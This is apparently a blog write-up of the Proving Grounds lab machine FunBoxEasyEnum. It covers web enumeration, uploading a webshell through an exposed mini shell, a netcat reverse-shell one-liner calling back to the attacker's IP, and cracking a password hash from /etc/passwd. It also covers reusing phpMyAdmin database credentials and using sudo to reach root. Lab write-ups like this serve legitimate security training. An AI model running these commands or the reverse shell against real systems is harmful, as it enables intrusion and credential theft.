pg-funboxeasyenum-play

FunBoxEasyEnum

Nmap
sudo nmap 192.168.68.132 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

We now move onto enumerating with dirsearch.py. First running seclists big.txt against the target.

python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 –full-url -t 75

We view robots.txt and find it contains contains:

Allow: Enum_this_Box

I ran dirsearch.py against this and was unable to find anything further. Viewing /phpmyadmin and attempting to login with default credentials shows we are unable to proceed with the default root account.

Running dirsearch.py again on the target this time using the --suffix parameter to append .php to all entries we find /mini.php.

┌──(kali㉿puckie)-[~/offsec/funboxeasyenum]
└─$ python3 /usr/share/dirsearch/dirsearch.py -u http://192.168.109.132/ -w /usr/share/dirb/wordlists/big.txt --full-url -t 75 --suffix=.php

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | Suffixes: .php | HTTP method: GET | Threads: 75
Wordlist size: 20468

Output File: /home/kali/.dirsearch/reports/192.168.109.132/_21-08-27_08-32-48.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-08-27_08-32-48.log

Target: http://192.168.109.132/

[08:32:48] Starting: 
[08:32:49] 403 - 280B - http://192.168.109.132/.htpasswd.php
[08:32:53] 403 - 280B - http://192.168.109.132/.htaccess.php
[08:33:32] 200 - 4KB - http://192.168.109.132/mini.php

Task Completed

Browsing to /mini.php we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php

Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data.

Running the command which nc shows we have netcat installed on the target machine. I set up a netcat listener on my target machine then run the following command on the webshell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f

Resulting in a reverse shell.

Upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

Checking /etc/passwd shows the user ‘oracle’ has a password hash in the file.

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
$

I then took the hash and run it under mode 500 on Hashcat on my Windows host which cracked the password as: hiphop

PS E:\PENTEST\hashcat-4.2.1> .\hashcat32.exe -m500 .\linuxhash.TXT E:\PENTEST\thc-hydra\rockyou.txt --force
hashcat (v4.2.1) starting...

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: E:\PENTEST\thc-hydra\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 9 secs

$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop

Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0

I then used su to switch to the user ‘oracle’ and was successful switching.

After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.

I disconnected the shell and run the initial exploit on the web shell to get connect as www-data. Moving into /etc/phpyadmin and then reading read the config-db.php file we see credential information.

We find the credentials phpmyadmin:tgbzhnujm! I then logged in MySQL and was unable to identify interesting information in the contained databases.

From here I starting throwing the passwords at the users in the /home/ directory until I got a match on the user ‘karla’.

Knowing this worked I excited the shell and logged into SSH with the same information just so we have all the advantages of a SSH shell.

$ su karla
su: must be run from a terminal
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@funbox7:/$ su karla
su karla
Password: tgbzhnujm!

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

karla@funbox7:/$ sudo -l
sudo -l
[sudo] password for karla: tgbzhnujm!

Matching Defaults entries for karla on funbox7:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karla may run the following commands on funbox7:
(ALL : ALL) ALL
karla@funbox7:/$ sudo /bin/bash -p
sudo /bin/bash -p
root@funbox7:/#

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *